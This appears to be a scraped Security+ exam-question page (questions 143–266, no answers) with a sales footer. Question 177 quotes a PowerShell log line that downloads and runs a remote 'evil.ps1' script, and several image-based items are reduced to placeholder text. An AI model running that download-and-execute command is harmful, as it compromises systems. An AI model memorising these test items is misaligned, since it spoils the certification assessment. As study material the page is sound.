After failing an audit twice, an organization has been ordered by a government regulatory agency to pay fines. Which of the following caused this action?

A.

Non-compliance

B.

Contract violations

C.

Government sanctions

D.

Rules of engagement

Question # 143

A systems administrator is creating a script that would save time and prevent human error when performing account creation for a large number of end users. Which of the following would be a good use case for this task?

A.

Off-the-shelf software

B.

Orchestration

C.

Baseline

D.

Policy enforcement

Question # 144

Which of the following risk management strategies should an enterprise adopt first if a legacy application is critical to business operations and there are preventative controls that are not yet implemented?

A.

Mitigate

B.

Accept

C.

Transfer

D.

Avoid

Question # 145

The Chief Information Security Officer (CISO) at a large company would like to gain an understanding of how the company ' s security policies compare to the requirements imposed by external regulators. Which of the following should the CISO use?

A.

Penetration test

B.

Internal audit

C.

Attestation

D.

External examination

Question # 146

Which of the following cryptographic solutions protects data at rest?

A.

Digital signatures

B.

Full disk encryption

C.

Private key

D.

Steganography

Question # 147

Which of the following is the best way to prevent data from being leaked from a secure network that does not need to communicate externally?

A.

Air gap

B.

Containerization

C.

Virtualization

D.

Decentralization

Question # 148

An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk. Which type of control is being implemented?

A.

Compensating

B.

Detective

C.

Operational

D.

Physical

Question # 149

A penetration testing report indicated that an organization should implement controls related to database input validation. Which of the following best identifies the type of vulnerability that was likely discovered during the test?

A.

XSS

B.

Command injection

C.

Buffer overflow

D.

SQLi

Question # 150

An organization is looking to optimize its environment and reduce the number of patches necessary for operating systems. Which of the following will best help to achieve this objective?

A.

Microservices

B.

Virtualization

C.

Real-time operating system

D.

Containers

Question # 151

An organization needs to monitor its users ' activities to prevent insider threats. Which of the following solutions would help the organization achieve this goal?

A.

Behavioral analytics

B.

Access control lists

C.

Identity and access management

D.

Network intrusion detection system

Question # 152

Which of the following is an example of memory injection?

A.

Two processes access the same variable, allowing one to cause a privilege escalation.

B.

A process receives an unexpected amount of data, which causes malicious code to be executed.

C.

Malicious code is copied to the allocated space of an already running process.

D.

An executable is overwritten on the disk, and malicious code runs the next time it is executed.

Question # 153

Employees located off-site must have access to company resources in order to complete their assigned tasks These employees utilize a solution that allows remote access without interception concerns. Which of the following best describes this solution?

A.

Proxy server

B.

NGFW

C.

VPN

D.

Security zone

Question # 154

Which of the following are the best for hardening end-user devices? (Selecttwo)

A.

Full disk encryption

B.

Group-level permissions

C.

Account lockout

D.

Endpoint protection

E.

Proxy server

F.

Segmentation

Question # 155

For which of the following reasons would a systems administrator leverage a 3DES hash from an installer file that is posted on a vendor ' s website?

A.

To test the integrity of the file

B.

To validate the authenticity of the file

C.

To activate the license for the file

D.

To calculate the checksum of the file

Question # 156

Which of the following makes Infrastructure as Code (IaC) a preferred security architecture over traditional infrastructure models?

A.

Common attacks are less likely to be effective.

B.

Configuration can be better managed and replicated.

C.

Outsourcing to a third party with more expertise in network defense is possible.

D.

Optimization can occur across a number of computing instances.

Question # 157

A company performs a risk assessment on the information security program each year. Which of the following best describes this risk assessment?

A.

Recurring

B.

Ad hoc

C.

One time

D.

Continuous

Question # 158

Which of the following allows an exploit to go undetected by the operating system?

A.

Firmware vulnerabilities

B.

Side loading

C.

Memory injection

D.

Encrypted payloads

Question # 159

An IT administrator needs to ensure data retention standards are implemented on an enterprise application. Which of the following describes the administrator ' s role?

A.

Processor

B.

Custodian

C.

Privacy officer

D.

Owner

Question # 160

In which of the following will unencrypted PLC management traffic most likely be found?

A.

SDN

B.

IoT

C.

VPN

D.

SCADA

Question # 161

A company is experiencing issues with employees leaving the company for a competitor and taking customer contact information with them. Which of the following tools will help prevent this from reoccurring?

A.

FIM

B.

NAC

C.

IDS

D.

UBA

Question # 162

An organization determines that tenured employees have retained privileges beyond those required to perform their duties. Which of the following should the organization do to address the issue?

A.

Implement regular account reviews.

B.

Provide privileged user account training.

C.

Require a jump box for privileged account use.

D.

Apply more restrictive security baselines.

Question # 163

A university employee logged on to the academic server and attempted to guess the system administrators ' log-in credentials. Which of the following security measures should the university have implemented to detect the employee ' s attempts to gain access to the administrators ' accounts?

A.

Two-factor authentication

B.

Firewall

C.

Intrusion prevention system

D.

User activity logs

Question # 164

A company discovered its data was advertised for sale on the dark web. During the initial investigation, the company determined the data was proprietary data. Which of the following is the next step the company should take?

A.

Identity the attacker sentry methods.

B.

Report the breach to the local authorities.

C.

Notify the applicable parties of the breach.

D.

Implement vulnerability scanning of the company ' s systems.

Question # 165

Which of the following best protects sensitive data in transit across a geographically dispersed Infrastructure?

A.

Encryption

B.

Masking

C.

Tokenization

D.

Obfuscation

Question # 166

While investigating a recent security breach an analyst finds that an attacker gained access by SOL infection through a company website. Which of the following should the analyst recommend to the website developers to prevent this from reoccurring?

A.

Secure cookies

B.

Input sanitization

C.

Code signing

D.

Blocklist

Question # 167

An IT manager informs the entire help desk staff that only the IT manager and the help desk lead will have access to the administrator console of the help desk software. Which of the following security techniques is the IT manager setting up?

A.

Hardening

B.

Employee monitoring

C.

Configuration enforcement

D.

Least privilege

Question # 168

During a routine audit, an analyst discovers that a department at a high school uses a simulation program that was not properly vetted before deployment. Which of the following threats is this an example of?

Question # 169

An analyst is reviewing an incident in which a user clicked on a link in a phishing email. Which of the following log sources would the analyst utilize to determine whether the connection was successful?

A.

Network

B.

System

C.

Application

D.

Authentication

Question # 170

An enterprise is trying to limit outbound DNS traffic originating from its internal network. Outbound DNS requests will only be allowed from one device with the IP address 10.50.10.25. Which of the following firewall ACLs will accomplish this goal?

A.

Access list outbound permit 0.0.0.0/0 0.0.0.0/0 port 53Access list outbound deny 10.50.10.25/32 0.0.0.0/0 port 53

B.

Access list outbound permit 0.0.0.0/0 10.50.10.25/32 port 53Access list outbound deny 0.0.0.0/0 0.0.0.0/0 port 53

C.

Access list outbound permit 0.0.0.0/0 0.0.0.0/0 port 53Access list outbound deny 0.0.0.0/0 10.50.10.25/32 port 53

D.

Access list outbound permit 10.50.10.25/32 0.0.0.0/0 port 53Access list outbound deny 0.0.0.0/0 0.0.0.0/0 port 53

Question # 171

A company is using a legacy FTP server to transfer financial data to a third party. The legacy system does not support SFTP, so a compensating control is needed to protect the sensitive, financial data in transit. Which of the following would be the most appropriate for the company to use?

A.

Telnet connection

B.

SSH tunneling

C.

Patch installation

D.

Full disk encryption

Question # 172

A security analyst learns that an attack vector, which was used as a part of a recent incident, was a well-known IoT device exploit. The analyst needs to review logs to identify the time of initial exploit. Which of the following logs should the analyst review first?

A.

Wireless access point

B.

Switch

C.

Firewall

D.

NAC

Question # 173

A software developer wishes to implement an application security technique that will provide assurance of the application ' s integrity. Which of the following techniques will achieve this?

A.

Secure cookies

B.

Input validation

C.

Static analysis

D.

Code signing

Question # 174

A security administrator wants to determine if the company ' s social engineering training is effective. Which of the following should the administrator do to complete this task?

A.

Set up a honeypot.

B.

Send out a survey.

C.

Set up a focus group.

D.

Conduct a phishing campaign.

Question # 175

Which of the following automation use cases would best enhance the security posture of an organization by rapidly updating permissions when employees leave a company?

A.

Provisioning resources

B.

Disabling access

C.

Reviewing change approvals

D.

Escalating permission requests

Question # 176

In which of the following scenarios is tokenization the best privacy technique 10 use?

A.

Providing pseudo-anonymization tor social media user accounts

B.

Serving as a second factor for authentication requests

C.

Enabling established customers to safely store credit card Information

D.

Masking personal information inside databases by segmenting data

Question # 177

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

A.

System event logs

B.

EDR logs

C.

Firewall logs

D.

Application logs

Question # 178

Which of the following explains how regular patching helps mitigate risks when securing an enterprise environment?

A.

It improves server performance by reducing software bugs.

B.

It addresses known software vulnerabilities before they are exploited.

C.

It eliminates the need for firewalls and intrusion detection.

D.

It removes the need for antivirus tools.

Question # 179

An enterprise has been experiencing attacks focused on exploiting vulnerabilities in older browser versions with well-known exploits. Which of the following security solutions should be configured to best provide the ability to monitor and block these known signature-based attacks?

A.

ACL

B.

DLP

C.

IDS

D.

IPS

Question # 180

A company processes a large volume of business-to-business transactions and prioritizes data confidentiality over transaction availability. The company ' s firewall administrator must configure a new hardware-based firewall to replace the current one. Which of the following should the administrator do to best align with the company requirements in case a security event occurs?

A.

Ensure the firewall data plane moves to fail-closed mode.

B.

Implement a deny-all rule as the last firewall ACL rule.

C.

Prioritize business-critical application traffic through the firewall.

D.

Configure rate limiting between the firewall interfaces.

Question # 181

An organization is evaluating the cost of licensing a new solution to prevent ransomware. Which of the following is the most helpful in making this decision?

A.

ALE

B.

SLE

C.

RTO

D.

ARO

Question # 182

Which of the following security threats aims to compromise a website that multiple employees frequently visit?

A.

Supply chain

B.

Typosquatting

C.

Watering hole

D.

Impersonation

Question # 183

During a penetration test in a hypervisor, the security engineer is able to use a script to inject a malicious payload and access the host filesystem. Which of the following best describes this vulnerability?

A.

VM escape

B.

Cross-site scripting

C.

Malicious update

D.

SQL injection

Question # 184

Which of the following is the main consideration when a legacy system that is a critical part of a company ' s infrastructure cannot be replaced?

A.

Resource provisioning

B.

Cost

C.

Single point of failure

D.

Complexity

Question # 185

An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device.

Which of the following best describes the user’s activity?

A.

Penetration testing

B.

Phishing campaign

C.

External audit

D.

Insider threat

Question # 186

A software developer would like to ensure. The source code cannot be reverse engineered or debugged. Which of the following should the developer consider?

A.

Version control

B.

Obfuscation toolkit

C.

Code reuse

D.

Continuous integration

E.

Stored procedures

Question # 187

A security analyst receives alerts about an internal system sending a large amount of unusual DNS queries to systems on the internet over short periods of time during non-business hours. Which of the following is most likely occurring?

A.

A worm is propagating across the network.

B.

Data is being exfiltrated.

C.

A logic bomb is deleting data.

D.

Ransomware is encrypting files.

Question # 188

The Chief Information Security Officer (CISO) of a medium-sized business plans to modernize the existing security infrastructure and address issues with legacy software and assets. Which of the following should the CISO use to determine the scope of the legacy infrastructure and develop a risk-based approach to modernization?

A.

Angry IP Scanner

B.

OWASP Web Security Testing Guide

C.

CIS benchmarks

D.

Metasploit Framework

Question # 189

Which of the following best distinguishes hacktivists from insider threats?

A.

Hacktivists often act based on ideological or political beliefs rather than organizational access.

B.

Hacktivists are generally employed by the target organization at the time of attack.

C.

Hacktivists often target organizations without prior access or internal affiliation.

D.

Hacktivists are primarily motivated by personal conflicts or employment-related dissatisfaction.

Question # 190

A security practitioner completes a vulnerability assessment on a company ' s network and finds several vulnerabilities, which the operations team remediates. Which of the following should be done next?

A.

Conduct an audit.

B.

Initiate a penetration test.

C.

Rescan the network.

D.

Submit a report.

Question # 191

An organization’s internet-facing website was compromised when an attacker exploited a buffer overflow. Which of the following should the organization deploy to best protect against similar attacks in the future?

A.

NGFW

B.

WAF

C.

TLS

D.

SD-WAN

Question # 192

A network engineer is increasing the overall security of network devices and needs to harden the devices. Which of the following will best accomplish this task?

A.

Configuring centralized logging

B.

Generating local administrator accounts

C.

Replacing Telnet with SSH

D.

Enabling HTTP administration

Question # 193

Which of the following best describes the concept of information being stored outside of its country of origin while still being subject to the laws and requirements of the country of origin?

A.

Data sovereignty

B.

Geolocation

C.

Intellectual property

D.

Geographic restrictions

Question # 194

A penetration tester visits a client’s website and downloads the site ' s content. Which of the following actions is the penetration tester performing?

A.

Unknown environment testing

B.

Vulnerability scan

C.

Due diligence

D.

Passive reconnaissance

Question # 195

A company is discarding a classified storage array and hires an outside vendor to complete the disposal. Which of the following should the company request from the vendor?

A.

Certification

B.

Inventory list

C.

Classification

D.

Proof of ownership

Question # 196

A company performs risk analysis on its equipment and estimates it will experience about ten incidents over a five-year period. Which of the following is the correct ARO for the equipment?

A.

2

B.

5

C.

10

D.

50

Question # 197

An organization experiences a suspected data breach that affects sensitive client information. The incident response team must preserve logs, server images, and email communications related to the breach. Which of the following best describes this course of action?

A.

Maintaining the chain of custody

B.

Performing root cause analysis

C.

Enforcing a legal hold

D.

Conducting a containment activity

Question # 198

A security analyst notices an increase in port scans on the edge of the corporate network. Which of the following logs should the analyst check to obtain the attacker ' s source IP address?

A.

Security

B.

Firewall

C.

Application

D.

Endpoint

Question # 199

An employee clicked a link in an email from a payment website that asked the employee to update contact information. The employee entered the log-in information but received a “page not found” error message. Which of the following types of social engineering attacks occurred?

A.

Brand impersonation

B.

Pretexting

C.

Typosquatting

D.

Phishing

Question # 200

Which of the following would be the best way to test resiliency in the event of a primary power failure?

A.

Parallel processing

B.

Tabletop exercise

C.

Simulation testing

D.

Production failover

Question # 201

A security engineer receives reports of unauthorized devices on the organization ' s network. Which of the following best describes a secure and effective way to mitigate the risks?

A.

Deploy a NAC solution to block wireless connections until devices can be verified against the baseline configuration.

B.

Set the NAC solution to only accept handshakes initiated from a static set of IP addresses.

C.

Configure a NAC solution to enforce 802.1X authentication with device certificates and implement endpoint security checks.

D.

Implement a NAC solution that redirects all devices to the guest Wi-Fi for holding until a security analyst can validate the security compliance.

Question # 202

A security audit of an organization revealed that most of the IT staff members have domain administrator credentials and do not change the passwords regularly. Which of the following solutions should the security learn propose to resolve the findings in the most complete way?

A.

Creating group policies to enforce password rotation on domain administrator credentials

B.

Reviewing the domain administrator group, removing all unnecessary administrators, and rotating all passwords

C.

Integrating the domain administrator ' s group with an IdP and requiring SSO with MFA for all access

D.

Securing domain administrator credentials in a PAM vault and controlling access with role-based access control

Question # 203

Employees in the research and development business unit receive extensive training to ensure they understand how to best protect company data. Which of the following is the type of data these employees are most likely to use in day-to-day work activities?

A.

Encrypted

B.

Intellectual property

C.

Critical

D.

Data in transit

Question # 204

Which of the following prevents unauthorized modifications to internal processes, assets, and security controls?

A.

Change management

B.

Playbooks

C.

Incident response

D.

Acceptable use policy

Question # 205

A business uses Wi-Fi with content filleting enabled. An employee noticed a coworker accessed a blocked sue from a work computer and repotted the issue. While Investigating the issue, a security administrator found another device providing internet access to certain employees. Which of the following best describes the security risk?

A.

The host-based security agent Is not running on all computers.

B.

A rogue access point Is allowing users to bypass controls.

C.

Employees who have certain credentials are using a hidden SSID.

D.

A valid access point is being jammed to limit availability.

Question # 206

Which of the following best describes the importance of implementing filesystem journaling?

A.

Replication to a secondary form of media reduces the risk of failure when the secondary media is remote.

B.

The recovery time always exceeds the RTO and RPO requirements during system downtime.

C.

A point-in-time backup provides faster data recovery if data on a disk is corrupted.

D.

A log of changes can enable recovery to a desired state after a failure.

Question # 207

Which of the following log sources best detects port scan activity?

A.

Firewall

B.

Proxy

C.

Endpoint

D.

NetFlow

Question # 208

An organization is required to provide assurance that its controls are properly designed and operating effectively. Which of the following reports will best achieve the objective?

A.

Red teaming

B.

Penetration testing

C.

Independent audit

D.

Vulnerability assessment

Question # 209

A company makes a change during the appropriate change window, but the unsuccessful change extends beyond the scheduled time and impacts customers. Which of the following would prevent this from reoccurring?

A.

User notification

B.

Change approval

C.

Risk analysis

D.

Backout plan

Question # 210

Which of the following is most likely associated with introducing vulnerabilities on a corporate network by the deployment of unapproved software?

A.

Hacktivists

B.

Script kiddies

C.

Competitors

D.

Shadow IT

Question # 211

After a security incident, a systems administrator asks the company to buy a NAC platform. Which of the following attack surfaces is the systems administrator trying to protect?

A.

Bluetooth

B.

Wired

C.

NFC

D.

SCADA

Question # 212

A recent black-box penetration test of http://example.com discovered that external

website vulnerabilities exist, such as directory traversals, cross-site scripting, cross-site forgery, and insecure protocols.

You are tasked with reducing the attack space and enabling secure protocols.

INSTRUCTIONS

Part 1

Use the drop-down menus to select the appropriate technologies for each location to implement a secure and resilient web architecture. Not all technologies will be used, and technologies may be used multiple times.

Part 2

Use the drop-down menus to select the appropriate command snippets from the drop-down menus. Each command section must be filled.

SY0-701 question answer

SY0-701 question answer

SY0-701 question answer

SY0-701 question answer

Question # 213

The executive management team is mandating the company develop a disaster recovery plan. The cost must be kept to a minimum, and the money to fund additional internet connections is not available. Which of the following would be the best option?

A.

Hot site

B.

Cold site

C.

Failover site

D.

Warm site

Question # 214

After a series of account compromises and credential misuse, a company hires a security manager to develop a security program. Which of the following steps should the security manager take first to increase security awareness?

A.

Evaluate tools that identify risky behavior and distribute reports on the findings.

B.

Send quarterly newsletters that explain the importance of password management.

C.

Develop phishing campaigns and notify the management team of any successes.

D.

Update policies and handbooks to ensure all employees are informed of the new procedures.

Question # 215

A company wants to ensure employees are allowed to copy files from a virtual desktop during the workday but are restricted during non-working hours. Which of the following security measures should the company set up?

A.

Digital rights management

B.

Role-based access control

C.

Time-based access control

D.

Network access control

Question # 216

A security engineer needs to analyze the implications of moving proprietary company data from a local server to a public cloud storage service. Which of the following actions should the engineer take first?

A.

Create an architecture diagram of cloud storage solutions.

B.

Migrate sample data to the cloud to run security tests.

C.

Agree on data classification labels with stakeholders.

D.

Make a backup of the data on cloud-neutral storage.

Question # 217

Which of the following is a reason why a forensic specialist would create a plan to preserve data after an modem and prioritize the sequence for performing forensic analysis?

A.

Order of volatility

B.

Preservation of event logs

C.

Chain of custody

D.

Compliance with legal hold

Question # 218

Which of the following best describe a penetration test that resembles an actual external attach?

A.

Known environment

B.

Partially known environment

C.

Bug bounty

D.

Unknown environment

Question # 219

An employee fell for a phishing scam, which allowed an attacker to gain access to a company PC. The attacker scraped the PC’s memory to find other credentials. Without cracking these credentials, the attacker used them to move laterally through the corporate network. Which of the following describes this type of attack?

A.

Privilege escalation

B.

Buffer overflow

C.

SQL injection

D.

Pass-the-hash

Question # 220

Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

A.

Preparation

B.

Recovery

C.

Lessons learned

D.

Analysis

Question # 221

Which of the following is the most likely outcome if a large bank fails an internal PCI DSS compliance assessment?

A.

Fines

B.

Audit findings

C.

Sanctions

D.

Reputation damage

Question # 222

A newly appointed board member with cybersecurity knowledge wants the board of directors to receive a quarterly report detailing the number of incidents that impacted the organization. The systems administrator is creating a way to present the data to the board of directors. Which of the following should the systems administrator use?

A.

Packet captures

B.

Vulnerability scans

C.

Metadata

D.

Dashboard

Question # 223

Which of the following is an example of a false negative vulnerability detection in a scan report?

A.

A vulnerability that does not actually exist

B.

A vulnerability that has already been remediated

C.

A result that shows no known vulnerability

D.

A zero-day vulnerability with a known remediation

Question # 224

A business is expanding to a new country and must protect customers from accidental disclosure of specific national identity information. Which of the following should the security engineer update to best meet business requirements?

A.

SIEM

B.

SCAP

C.

DLP

D.

WAF

Question # 225

A company ' s end users are reporting that they are unable to reach external websites. After reviewing the performance data for the DNS severs, the analyst discovers that the CPU, disk, and memory usage are minimal, but the network interface is flooded with inbound traffic. Network logs show only a small number of DNS queries sent to this server. Which of the following best describes what the security analyst is seeing?

A.

Concurrent session usage

B.

Secure DNS cryptographic downgrade

C.

On-path resource consumption

D.

Reflected denial of service

Question # 226

A company needs to determine whether authentication weaknesses in a customer-facing web application exist. Which of the following is the best technique to use?

A.

Static analysis

B.

Packet capture

C.

Agent-based scanning

D.

Dynamic analysis

E.

Network-based scanning

Question # 227

An external security assessment report indicates a high click rate on suspicious emails. The Chief Intelligence Security Officer (CISO) must reduce this behavior. Which of the following should the CISO do first?

A.

Update the acceptable use policy.

B.

Deploy a password management solution.

C.

Issue warning letters to affected users.

D.

Implement a phishing awareness campaign.

Question # 228

An unknown source has attacked an organization’s network multiple times. The organization has a firewall but no other source of protection against these attacks. Which of the following is the best security item to add?

A.

SIEM

B.

Load balancer

C.

UTM

D.

IPS

Question # 229

After creating a contract for IT contractors, the human resources department changed several clauses. The contract has gone through three revisions. Which of the following processes should the human resources department follow to track revisions?

A.

Version validation

B.

Version changes

C.

Version updates

D.

Version control

Question # 230

Executives at a company are concerned about employees accessing systems and information about sensitive company projects unrelated to the employees ' normal job duties. Which of the following enterprise security capabilities will the security team most likely deploy to detect that activity?

A.

UBA

B.

EDR

C.

NAC

D.

DLP

Question # 231

An enterprise security team is researching a new security architecture to better protect the company ' s networks and applications against the latest cyberthreats. The company has a fully remote workforce. The solution should be highly redundant and enable users to connect to a VPN with an integrated, software-based firewall. Which of the following solutions meets these requirements?

A.

IPS

B.

SIEM

C.

SASE

D.

CASB

Question # 232

Which of the following types of identification methods can be performed on a deployed application during runtime?

A.

Dynamic analysis

B.

Code review

C.

Package monitoring

D.

Bug bounty

Question # 233

A security administrator protects passwords by using hashing. Which of the following best describes what the administrator is doing?

A.

Adding extra characters at the end to increase password length

B.

Generating a token to make the passwords temporal

C.

Using mathematical algorithms to make passwords unique

D.

Creating a rainbow table to protect passwords in a list

Question # 234

Which of the following best represents an application that does not have an on-premises requirement and is accessible from anywhere?

A.

Pass

B.

Hybrid cloud

C.

Private cloud

D.

IaaS

E.

SaaS

Question # 235

A user would like to install software and features that are not available with a smartphone ' s default software. Which of the following would allow the user to install unauthorized software and enable new features?

A.

SOU

B.

Cross-site scripting

C.

Jailbreaking

D.

Side loading

Question # 236

A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit hardware?

A.

A thorough analysis of the supply chain

B.

A legally enforceable corporate acquisition policy

C.

A right to audit clause in vendor contracts and SOWs

D.

An in-depth penetration test of all suppliers and vendors

Question # 237

A security analyst finds a rogue device during a monthly audit of current endpoint assets that are connected to the network. The corporate network utilizes 002.1X for access control. To be allowed on the network, a device must have a Known hardware address, and a valid user name and password must be entered in a captive portal. The following is the audit report:

SY0-701 question answer

Which of the following is the most likely way a rogue device was allowed to connect?

A.

A user performed a MAC cloning attack with a personal device.

B.

A DMCP failure caused an incorrect IP address to be distributed

C.

An administrator bypassed the security controls for testing.

D.

DNS hijacking let an attacker intercept the captive portal traffic.

Question # 238

An employee receives a text message that appears to have been sent by the payroll department and is asking for credential verification. Which of the following social engineering techniques are being attempted? (Choose two.)

A.

Typosquatting

B.

Phishing

C.

Impersonation

D.

Vishing

E.

Smishing

F.

Misinformation

Question # 239

As part of new compliance audit requirements, multiple servers need to be segmented on different networks and should be reachable only from authorized internal systems. Which of the following would meet the requirements?

A.

Configure firewall rules to block external access to Internal resources.

B.

Set up a WAP to allow internal access from public networks.

C.

Implement a new IPSec tunnel from internal resources.

D.

Deploy an Internal Jump server to access resources.

Question # 240

Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow table attack?

A.

Digital signatures

B.

Salting

C.

Hashing

D.

Perfect forward secrecy

Question # 241

Which of the following explains how a supply chain service provider could introduce a security vulnerability into an organization?

A.

Delaying hardware shipments needed for system upgrades

B.

Outsourcing customer service operations to a foreign call center

C.

Failing to encrypt data stored on the organization’s internal database

D.

Having privileged access to client systems and becoming a target for attackers

Question # 242

An employee who was working remotely lost a mobile device containing company data. Which of the following provides the best solution to prevent future data loss?

A.

MDM

B.

DLP

C.

FDE

D.

EDR

Question # 243

Which of the following strategies should an organization use to efficiently manage and analyze multiple types of logs?

A.

Deploy a SIEM solution

B.

Create custom scripts to aggregate and analyze logs

C.

Implement EDR technology

D.

Install a unified threat management appliance

Question # 244

Sine© a recent upgrade (o a WLAN infrastructure, several mobile users have been unable to access the internet from the lobby. The networking team performs a heat map survey of the building and finds several WAPs in the area. The WAPs are using similar frequencies with high power settings. Which of the following installation considerations should the security team evaluate next?

A.

Channel overlap

B.

Encryption type

C.

New WLAN deployment

D.

WAP placement

Question # 245

The marketing department set up its own project management software without telling the appropriate departments. Which of the following describes this scenario?

A.

Shadow IT

B.

Insider threat

C.

Data exfiltration

D.

Service disruption

Question # 246

An organization is evaluating new regulatory requirements associated with the implementation of corrective controls on a group of interconnected financial systems. Which of the following is the most likely reason for the new requirement?

A.

To defend against insider threats altering banking details

B.

To ensure that errors are not passed to other systems

C.

To allow for business insurance to be purchased

D.

To prevent unauthorized changes to financial data

Question # 247

A systems administrator is auditing all company servers to ensure. They meet the minimum security baseline While auditing a Linux server, the systems administrator observes the /etc/shadow file has permissions beyond the baseline recommendation. Which of the following commands should the systems administrator use to resolve this issue?

A.

chmod

B.

grep

C.

dd

D.

passwd

Question # 248

A manufacturing organization receives the results from a penetration test. According to the results, legacy devices that are critical to continued business function display vulnerabilities. The devices have minimal vendor support and should be segmented and monitored closely. Which of the following devices were most likely identified?

A.

Workstations

B.

Embedded systems

C.

Core router

D.

DNS server

Question # 249

A security analyst must identify abnormal behavior on the server. Which of the following does the analyst most likely need to do?

A.

Disable unnecessary ports.

B.

Patch the system.

C.

Establish baselines.

D.

Perform alert tuning.

Question # 250

A security analyst is reviewing logs and discovers the following:

SY0-701 question answer

Which of the following should be used lo best mitigate this type of attack?

A.

Input sanitization

B.

Secure cookies

C.

Static code analysis

D.

Sandboxing

Question # 251

A company is changing its mobile device policy. The company has the following requirements:

Company-owned devices

Ability to harden the devices

Reduced security risk

Compatibility with company resources

Which of the following would best meet these requirements?

A.

BYOD

B.

CYOD

C.

COPE

D.

COBO

Question # 252

A security company informs its customers of a new vulnerability that affects web applications. The vulnerability does not have an available patch at the moment. Which of the following best describes this vulnerability?

A.

Zero-day

B.

XSS

C.

SQLi

D.

Buffer overflow

Question # 253

A company prepares for an upcoming regulatory audit. The company wants to perform a gap analysis in the most cost-effective way. Which of the following will help the company achieve this goal?

A.

Internal self-assessment

B.

Active reconnaissance

C.

Red team penetration test

D.

Tabletop exercise

Question # 254

Which of the following is prevented by proper data sanitization?

A.

Hackers ' ability to obtain data from used hard drives

B.

Devices reaching end-of-life and losing support

C.

Disclosure of sensitive data through incorrect classification

D.

Incorrect inventory data leading to a laptop shortage

Question # 255

Which of the following are the best security controls for controlling on-premises access? (Select two.)

A.

Swipe card

B.

Picture ID

C.

Phone authentication application

D.

Biometric scanner

E.

Camera

F.

Memorable

Question # 256

While reviewing logs, a security administrator identifies the following code:

< script > function(send_info) < /script >

Which of the following best describes the vulnerability being exploited?

A.

XSS

B.

SQLi

C.

DDoS

D.

CSRF

Question # 257

A company wants to track modifications to the code that is used to build new virtual servers. Which of the following will the company most likely deploy?

A.

Change management ticketing system

B.

Behavioral analyzer

C.

Collaboration platform

D.

Version control tool

Question # 258

An organization is leveraging a VPN between its headquarters and a branch location. Which of the following is the VPN protecting?

A.

Data in use

B.

Data in transit

C.

Geographic restrictions

D.

Data sovereignty

Question # 259

After a recent ransomware attack on a company ' s system, an administrator reviewed the log files. Which of the following control types did the administrator use?

A.

Compensating

B.

Detective

C.

Preventive

D.

Corrective

Question # 260

An administrator wants to perform a risk assessment without using proprietary company information. Which of the following methods should the administrator use to gather information?

A.

Network scanning

B.

Penetration testing

C.

Open-source intelligence

D.

Configuration auditing

Question # 261

A security engineer configured a remote access VPN. The remote access VPN allows end users to connect to the network by using an agent that is installed on the endpoint, which establishes an encrypted tunnel. Which of the following protocols did the engineer most likely implement?

A.

GRE

B.

IPSec

C.

SD-WAN

D.

EAP

Question # 262

Which of the following solutions would most likely be used in the financial industry to mask sensitive data?

A.

Tokenization

B.

Hashing

C.

Salting

D.

Steganography

Question # 263

A developer receives this message when testing a new external website:

This site cannot be reached.

Which of the following logs would most likely help identify the root cause?

A.

Firewall

B.

IDS

C.

Application

D.

System

Question # 264

A network administrator must turn off insecure protocols after a recent inspection. Which of the following best describes the vulnerability the network administrator is remediating?

A.

Device misconfigurations

B.

Sideloading

C.

Memory injection

D.

Malicious update

Question # 265

Which of the following is used to protect a computer from viruses, malware, and Trojans being installed and moving laterally across the network?

A.

IDS

B.

ACL

C.

EDR

D.

NAC

Question # 266

Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked.

Which of the following changes would allow users to access the site?

A.

Creating a firewall rule to allow HTTPS traffic

B.

Configuring the IPS to allow shopping

C.

Tuning the DLP rule that detects credit card data

D.

Updating the categorization in the content filter

SY0-701 PDF

$33

$109.99

3 Months Free Update

  • Printable Format
  • Value of Money
  • 100% Pass Assurance
  • Verified Answers
  • Researched by Industry Experts
  • Based on Real Exams Scenarios
  • 100% Real Questions

SY0-701 PDF + Testing Engine

$52.8

$175.99

3 Months Free Update

  • Exam Name: CompTIA Security+ Exam 2026
  • Last Update: Jul 5, 2026
  • Questions and Answers: 887
  • Free Real Questions Demo
  • Recommended by Industry Experts
  • Best Economical Package
  • Immediate Access

SY0-701 Engine

$39.6

$131.99

3 Months Free Update

  • Best Testing Engine
  • One Click installation
  • Recommended by Teachers
  • Easy to use
  • 3 Modes of Learning
  • State of Art Technology
  • 100% Real Questions included